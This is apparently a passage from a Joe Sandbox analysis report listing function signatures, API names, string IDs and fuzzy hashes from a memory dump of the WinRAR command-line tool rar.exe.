                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$CreateErrorLast$Time
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1999340476-0
                                                                                                                                                                                                                              • Opcode ID: 892e3554a84f7d5f3af4d66201b4842f90aabb2a874f58c4d931fe245cb08f10
                                                                                                                                                                                                                              • Instruction ID: c5f78c9b21c7519e8a15c6632fa3748e957444f04285015ec2167eb7b599e976
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 892e3554a84f7d5f3af4d66201b4842f90aabb2a874f58c4d931fe245cb08f10
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8E414472A196C14AFB649F24E8057E9AAE0EB45BB8F800334DE7D436C4CF7CC4659B60

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: swprintf
                                                                                                                                                                                                                              • String ID: rar.ini$switches=$switches_%ls=
                                                                                                                                                                                                                              • API String ID: 233258989-2235180025
                                                                                                                                                                                                                              • Opcode ID: 7d70d85aa57c4b2adeedb5d1110c6c2e0691d0eb838de4c05f034f10faa9e0d3
                                                                                                                                                                                                                              • Instruction ID: 2f346b12162901a7ffb76c92fb5f141b3d1c0f424a2fbd384a1097656dd7f5ab
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7d70d85aa57c4b2adeedb5d1110c6c2e0691d0eb838de4c05f034f10faa9e0d3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CF416922A1868295EB14BF21D4111E9A3E0FB547B4F810135EA6D03ADAEF3CE665D330

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressHandleModuleProcsetbuf$ErrorLibraryLoadModeVersion
                                                                                                                                                                                                                              • String ID: rar.lng
                                                                                                                                                                                                                              • API String ID: 553376247-2410228151
                                                                                                                                                                                                                              • Opcode ID: 39970e7c6d0227ca57f33f9c031fdb4e3bcfaef39f08ad794915361c5ea6dedb
                                                                                                                                                                                                                              • Instruction ID: 118e69a701acb4ae1448cb70e949eb897e4c9f6e56cedd5f625e1711724d1643
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 39970e7c6d0227ca57f33f9c031fdb4e3bcfaef39f08ad794915361c5ea6dedb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 74415D22A086C349EE14BF21A8111FDE3E19F91B74FD86035E94E476D6CE2DE925A730

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SHGetMalloc.SHELL32(?,00000800,?,00007FF7CF8B4432,?,?,?,?,00000800,00000000,00000000,00007FF7CF8B38CB,?,?,?,00007FF7CF8B41EC), ref: 00007FF7CF8B40C4
                                                                                                                                                                                                                              • SHGetSpecialFolderLocation.SHELL32(?,?,?,?,00000800,00000000,00000000,00007FF7CF8B38CB,?,?,?,00007FF7CF8B41EC), ref: 00007FF7CF8B40DF
                                                                                                                                                                                                                              • SHGetPathFromIDListW.SHELL32 ref: 00007FF7CF8B40F1
                                                                                                                                                                                                                                • Part of subcall function 00007FF7CF8A3458: CreateDirectoryW.KERNEL32(00000800,00000000,?,00007FF7CF8B413F,?,?,?,?,00000800,00000000,00000000,00007FF7CF8B38CB,?,?,?,00007FF7CF8B41EC), ref: 00007FF7CF8A34A0
                                                                                                                                                                                                                                • Part of subcall function 00007FF7CF8A3458: CreateDirectoryW.KERNEL32(00000800,00000000,?,00007FF7CF8B413F,?,?,?,?,00000800,00000000,00000000,00007FF7CF8B38CB,?,?,?,00007FF7CF8B41EC), ref: 00007FF7CF8A34D5
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateDirectory$FolderFromListLocationMallocPathSpecial
                                                                                                                                                                                                                              • String ID: WinRAR
                                                                                                                                                                                                                              • API String ID: 977838571-3970807970
                                                                                                                                                                                                                              • Opcode ID: 415bfa020dc0990cad3e0501dba2d99d0bb0d0c3ec71343b5049903f98ccb042
                                                                                                                                                                                                                              • Instruction ID: 12ce11e02b519585aff22183057c4d781cc225b95609cb1b52070b0ba076ac25
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 415bfa020dc0990cad3e0501dba2d99d0bb0d0c3ec71343b5049903f98ccb042
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A7218426A08B8285EB50AF12F8511FA93A0EF99BE4F945031DF0E47755DE3CD4649730
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$FileHandleRead
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2244327787-0
                                                                                                                                                                                                                              • Opcode ID: 3b78d4ed6aa6b5a120351a24eca7d2297273107fe5a6a7e720e5693830f3c1e4
                                                                                                                                                                                                                              • Instruction ID: 157b8a48920d3d06f8173d427132dae0dc28cef8fe9a225ca303c9aa5b4824c5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3b78d4ed6aa6b5a120351a24eca7d2297273107fe5a6a7e720e5693830f3c1e4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C721C330E09EC686EB60AF21E4003B9E2E0FF41BB4FA10131E96D476C4CE2DD460AB31
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: AFUM$default.sfx
                                                                                                                                                                                                                              • API String ID: 0-2491287583
                                                                                                                                                                                                                              • Opcode ID: 9c5250dc79f526f8b88a1db49316f6b7f6f5dd8f7a69fa39e4eeb80febe8b362
                                                                                                                                                                                                                              • Instruction ID: f74de25a0b6da85296585c97b0233469ca22287fad7438237e34b712897383fd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9c5250dc79f526f8b88a1db49316f6b7f6f5dd8f7a69fa39e4eeb80febe8b362
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7081B221A086D284EB74BF1194112F9A2E0AF517A8FD4C032DE8D076C6DF3DB6A5E730
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe
                                                                                                                                                                                                                              • API String ID: 3307058713-2442246308
                                                                                                                                                                                                                              • Opcode ID: c5c98bd9bcb7567b946254e1cd77aa550a51c4497f1b66c7ef7d78e94eebfc81
                                                                                                                                                                                                                              • Instruction ID: 03166b6a8bb6fa0ba55f365d22c70d9691f5e00b08a26829d7ef949846ce3434
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c5c98bd9bcb7567b946254e1cd77aa550a51c4497f1b66c7ef7d78e94eebfc81
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C741923AA086D285EB14BF2598401FCABE4EF44BA4BA54035EE4E47B55DF3DE8619330
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileHandleType
                                                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                                                              • API String ID: 3000768030-2766056989
                                                                                                                                                                                                                              • Opcode ID: ac2df8724446a0d51fe7f393cd596ff3ce055ba98acd5cb21c7dcdd1beef0449
                                                                                                                                                                                                                              • Instruction ID: c77922d44e635ce7ad6de35aa4354e5de687701fd5b0133ea147b3157afd6a88
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ac2df8724446a0d51fe7f393cd596ff3ce055ba98acd5cb21c7dcdd1beef0449
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7921D82AA387C241EB605F2494902B9A7A5FB45774F641335D66E067E8CE3CDCA1E730
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Threadwcschr$CreateExceptionPriorityThrow
                                                                                                                                                                                                                              • String ID: CreateThread failed
                                                                                                                                                                                                                              • API String ID: 1217111108-3849766595
                                                                                                                                                                                                                              • Opcode ID: 23f25dd9d767684a47335cfb6564c8d2137849cd663ca384977e916ef4a87e16
                                                                                                                                                                                                                              • Instruction ID: d867101ed07ed21bbcbaed98a9774f5de055bc1ac4a0e123cd139745a6159ca3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 23f25dd9d767684a47335cfb6564c8d2137849cd663ca384977e916ef4a87e16
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B6114C32A08A8286EB05EF10E8411E9B3A0FB84BA4FD48131E68D43659DF3DE5669730
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CriticalSection$EnterEventLeave
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3094578987-0
                                                                                                                                                                                                                              • Opcode ID: 8fe9f8176e207c020d906139d049f12966b7ba6a10f6a81758c5b7eb42f71044
                                                                                                                                                                                                                              • Instruction ID: a9a8293bfe3958db26911609af57083e5b99740b59e369bbbd38395b941f9526
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8fe9f8176e207c020d906139d049f12966b7ba6a10f6a81758c5b7eb42f71044
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 53F06725608BC586DB10AF11E5400FDA3A0FB89FA9F845130DE9D07669CE3CD5659B30
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ConsoleFileHandleModeType
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4141822043-0
                                                                                                                                                                                                                              • Opcode ID: b15bfddebd279c5c829c27adb93723b3551ef5d7968acfa0ad204a509e36213f
                                                                                                                                                                                                                              • Instruction ID: a6eec46321598ebf7c4c9805f4272d1e6ff41ddcd8f5d59cd67147e0b4dd7454
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b15bfddebd279c5c829c27adb93723b3551ef5d7968acfa0ad204a509e36213f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 54E0C234F046834BFF586F21A8652B882D19F69BA0FC01034D80F4E750EE2CE4B59330
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
